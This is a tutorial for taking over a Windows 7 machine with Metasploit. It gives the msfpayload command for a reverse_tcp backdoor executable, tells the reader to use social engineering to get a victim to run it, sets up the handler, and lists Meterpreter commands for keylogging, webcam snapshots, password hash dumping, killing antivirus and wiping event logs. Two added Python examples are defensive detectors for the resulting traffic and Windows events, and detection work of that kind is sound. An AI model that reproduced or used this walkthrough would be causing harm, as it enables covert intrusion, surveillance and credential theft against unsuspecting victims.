Using Metasploit to Hack a Windows 7 machine + Meterpreter Commands
This tutorial is only for EDUCATIONAL purpose
Do IT AT YOUR OWN RISK!!!
(After the text version there is the video of this tutorial, and after the video there is a list of Meterpreter commands.)
Requirements:
1. Kali Linux/Backtrack
2. Metasploit Framework
Steps:
1. Open a terminal and type " service postgresql start && service metasploit start " (without the quotation marks).
2. Now we need to create a payload for the target machine.
Command for creating the payload:
' msfpayload windows/meterpreter/reverse_tcp LHOST=yourip LPORT=4444 X > /root/backdoor.exe '
Here, after LHOST= enter your own IP address (to find it, open a terminal, type ifconfig and read the address of your network interface). The trailing X tells msfpayload to output a Windows executable, and LPORT=4444 is the port the handler in step 6 will listen on.
3. Use your social engineering skill to get the payload run on the victim machine.
4. After you have successfully completed step 3, continue with the steps below.
5. Open the terminal and type " service postgresql start && service metasploit start " (without the quotation marks).
6. Type ' msfconsole '
and then type the following:
use exploit/multi/handler (press enter)
set payload windows/meterpreter/reverse_tcp (press enter)
set lhost (the IP you provided while creating the payload) (press enter)
set lport 4444 (press enter)
exploit
Once the target has been compromised, the session will look like the following:
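From the defender's side, the handler setup above leaves one unmistakable trace: the victim opens an outbound TCP connection to the attacker's LHOST on LPORT (4444 by default). The following added example (not part of the original tutorial) scans constructed firewall/netflow records for exactly that, and also for a workstation repeatedly re-connecting to the same host:port, the pattern left by a payload that is re-launched or retries its handler:

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample firewall/netflow records (not from the original post):
# <timestamp> <src_ip> <dst_ip> <dst_port> <proto>
SAMPLE_LOG = """\
2024-01-10T09:00:01 192.168.1.23 192.168.1.10 4444 tcp
2024-01-10T09:00:02 192.168.1.23 93.184.216.34 443 tcp
2024-01-10T09:00:31 192.168.1.23 192.168.1.10 4444 tcp
2024-01-10T09:01:01 192.168.1.23 192.168.1.10 4444 tcp
2024-01-10T09:01:05 192.168.1.40 192.168.1.5 445 tcp
"""

# 4444 is the LPORT the handler above listens on; add any other ports that
# have no legitimate use in your environment.
HANDLER_PORTS = {4444}

def parse_log(text):
    for line in text.splitlines():
        ts, src, dst, port, proto = line.split()
        yield datetime.fromisoformat(ts), src, dst, int(port), proto

def find_reverse_shell_candidates(text, repeat_threshold=3, window_s=120):
    """Return (kind, src, dst, port) alerts for two behaviours of a
    reverse_tcp payload: (a) any TCP connection to a known handler port,
    reported once per src/dst/port triple, and (b) a host re-connecting to
    the same dst:port `repeat_threshold` times within `window_s` seconds."""
    alerts, flagged, history = [], set(), defaultdict(list)
    for ts, src, dst, port, proto in parse_log(text):
        if proto != "tcp":
            continue
        key = (src, dst, port)
        if port in HANDLER_PORTS and key not in flagged:
            flagged.add(key)
            alerts.append(("handler_port",) + key)
        # keep only the connections that fall inside the sliding window
        history[key] = [t for t in history[key]
                        if (ts - t).total_seconds() <= window_s]
        history[key].append(ts)
        if len(history[key]) == repeat_threshold:
            alerts.append(("repeat_connect",) + key)
    return alerts
```

On the sample data the 192.168.1.23 host is reported once for talking to the handler port and once more when its third connection inside two minutes arrives; the SMB and HTTPS traffic is left alone.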
Video:
Meterpreter Commands:
1. sysinfo -----> shows the system build (x86 or x64), language, OS version, etc.
2. run checkvm -----> checks whether the victim is running in a virtual machine or on native hardware.
3. route -----> dumps the routing table to the screen and shows how the subnet has been configured, etc.
4. run get_application_list -----> shows you the applications installed on the remote PC.
5. uictl -----> control some of the user interface components.
6. idletime -----> shows how long the victim has not been active on the computer.
7. getpid -----> gets the process ID; shows the process you are currently running inside of.
8. getuid -----> shows the system identity you are running as, such as SYSTEM.
9. ps -----> shows all the processes running on the victim as well as their PIDs.
10. run get_env -----> gives you a lot of information about the system environment.
11. ifconfig and ipconfig -----> find out the IP address and see how many adapters are enabled.
12. ? -----> shows a list of the available commands.
13. getsystem -----> attempts to give you local SYSTEM privileges.
14. reboot -----> reboots the remote machine.
15. sc config service_name start= disabled -----> run from a Windows shell (see the shell command); stops a service from starting on the next system reboot. "service_name" is the name of the service you want to disable.
16. clearev -----> wipes all event logs.
17. execute -f cmd.exe -H -c -----> opens a command prompt on a hidden channel.
18. interact 1 -----> interacts with a channel; "1" is replaced with the channel you want to interact with.
19. download -----> downloads the specified file from the victim. Example: download c:\\boot.ini
20. upload -----> uploads files to the victim machine.
21. portfwd -----> forwards a local port to a remote service.
22. run getgui -e -----> enables remote desktop on the victim.
23. run gettelnet -e -----> enables telnet on the remote machine.
24. run getcountermeasure -----> checks the security configuration on the exploited machine and can disable countermeasures such as AV, firewalls, etc.
25. run killav -----> designed to kill most AVs that are running as a service on the exploited machine. Works on some but not all AVs.
26. run get_local_subnets -----> used to get the local subnet of the victim machine.
27. run hostedit -----> allows the attacker to add entries to the Windows hosts file. Because Windows checks the hosts file first, traffic can be diverted to a fake entry.
28. run remotewinenum -----> designed to enumerate the target system with the wmic command.
29. run winenum -----> used for system enumeration. It will dump tokens and hashes and issue both net and wmic commands.
30. run scraper -----> used for grabbing additional system information not included in the other system enumeration scripts, such as the "entire registry."
31. migrate -----> migrate to another process such as explorer.exe so you don't lose your session.
32. cat -----> read the contents of a file to the screen.
33. background (or ctrl + z) -----> background the current session.
34. irb -----> drop into irb scripting mode.
35. interact -----> interact with a channel.
36. load -----> load one or more Meterpreter extensions.
37. channel -----> displays info about active channels.
38. bgkill -----> kill a background Meterpreter script.
39. close -----> close a channel.
40. enumdesktops -----> list all accessible desktops and window stations.
41. getdesktop -----> get the current Meterpreter desktop.
42. lpwd -----> print the local working directory.
43. ls -----> list files.
44. rm -----> delete the specified file.
45. search -----> search for files.
46. upload -----> upload a file to the target.
47. keyscan_start -----> start capturing keystrokes.
48. keyscan_stop -----> stop capturing keystrokes.
49. keyscan_dump -----> dump the keystroke buffer.
50. screenshot -----> take a screenshot of the GUI.
51. setdesktop -----> change Meterpreter's current desktop.
52. getprivs -----> attempt to enable all privileges available to the current process.
53. kill -----> terminate a process. Example: kill 1834
54. reboot -----> reboots the remote computer.
55. reg -----> interact with the remote registry.
56. rev2self -----> calls RevertToSelf() on the remote machine.
57. shell -----> drop into a system shell.
58. shutdown -----> shuts down the remote computer.
59. steal_token -----> attempt to steal an impersonation token from a process.
60. webcam_list -----> list webcams.
61. webcam_snap -----> take a snapshot from the specified webcam.
62. hashdump -----> dumps the contents of the SAM database.
63. timestomp -----> manipulates MACE (Modified, Accessed, Created, Entry-modified) file attributes.
64. execute -----> execute a command.
65. info -----> display info about the active post module.
66. quit -----> terminate the Meterpreter session.
67. getwd -----> print the working directory.
68. mkdir -----> make a directory.
69. pwd -----> print the working directory.
70. drop_token -----> relinquishes any active impersonation token.
71. rmdir -----> remove a directory.
72. del -----> delete a file. Example: del passwords.txt
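Several of the commands in the list above leave host-side traces a defender can correlate: getsystem's service technique installs a service (System 7045), migrate injects into explorer.exe (Sysmon 8, CreateRemoteThread), run getgui -e / run gettelnet -e flip a remote-access service's start type (System 7040) and clearev clears the Security log (Security 1102). The added example below (not part of the original post) tags constructed event records with the Meterpreter action that typically produces them and escalates a host once two or more such actions occur within ten minutes; hostnames, service name and paths are made up:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows event records (not from the original post), one per line:
# <timestamp> <host> <channel> <EventID> <message>
SAMPLE_EVENTS = r"""
2024-01-10T09:02:10 WS01 System 7045 A service was installed in the system. Service Name: xYzAbCdE
2024-01-10T09:02:11 WS01 Sysmon 8 CreateRemoteThread detected: SourceImage: C:\Users\bob\backdoor.exe TargetImage: C:\Windows\explorer.exe
2024-01-10T09:02:40 WS01 System 7040 The start type of the Remote Desktop Services service was changed from disabled to auto start.
2024-01-10T09:03:05 WS01 Security 1102 The audit log was cleared.
2024-01-10T11:30:00 WS02 System 7040 The start type of the Windows Update service was changed from auto start to disabled.
""".strip()

# (EventID, message regex or None, Meterpreter action that typically produces it)
RULES = [
    (7045, None, "service installed: getsystem (service technique)"),
    (8, r"TargetImage: .*\\explorer\.exe", "remote thread into explorer.exe: migrate"),
    (7040, r"(Remote Desktop|Telnet).*from disabled", "remote-access service enabled: getgui/gettelnet -e"),
    (1102, None, "Security log cleared: clearev"),
]

def parse_events(text):
    for line in text.splitlines():
        ts, host, channel, event_id, msg = line.split(maxsplit=4)
        yield datetime.fromisoformat(ts), host, channel, int(event_id), msg

def tag_event(event_id, msg):
    """Return the action tags whose rule matches this single event."""
    return [tag for eid, pat, tag in RULES
            if eid == event_id and (pat is None or re.search(pat, msg))]

def correlate(text, window=timedelta(minutes=10), min_tags=2):
    """Group tagged events per host. One 7040 or 7045 on its own is routine
    admin activity; a host showing `min_tags` distinct actions inside
    `window` is escalated because that is the post-exploitation sequence."""
    hits = defaultdict(list)                      # host -> [(ts, tag)]
    for ts, host, _chan, eid, msg in parse_events(text):
        for tag in tag_event(eid, msg):
            hits[host].append((ts, tag))
    escalated = set()
    for host, events in hits.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            tags = {t for ts, t in events[i:] if ts - start <= window}
            if len(tags) >= min_tags:
                escalated.add(host)
                break
    return dict(hits), escalated
```

WS02's 7040 is a service being disabled, not a remote-access service being enabled, so it matches no rule and the host is never escalated; WS01 accumulates all four tags within a minute.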